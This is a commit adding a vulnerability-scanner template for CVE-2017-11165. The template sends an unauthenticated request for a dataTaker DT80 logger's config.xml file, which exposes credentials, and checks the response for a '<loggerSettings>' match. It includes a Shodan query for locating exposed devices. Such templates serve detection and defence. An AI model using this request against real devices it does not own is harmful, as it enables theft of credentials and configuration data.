Create CVE-2017-11165.yaml

cves/2017/CVE-2017-11165.yaml

@@ -0,0 +1,35 @@
+id: CVE-2017-11165
+
+info:
+  name: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure
+  author: theabhinavgaur
+  severity: critical
+  description: |
+    dataTaker DT80 dEX 1.50.012 allows remote attackers to obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-11165
+    - https://www.exploit-db.com/exploits/45094
+  metadata:
+    shodan-query:
+      - http.title:"datataker"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-200
+  tags: cve,cve2017,DataTaker,config,exposure,lfr
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/services/getFile.cmd?userfile=config.xml'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - <loggerSettings>
+        condition: and
+
+      - type: status
+        status:
+          - 200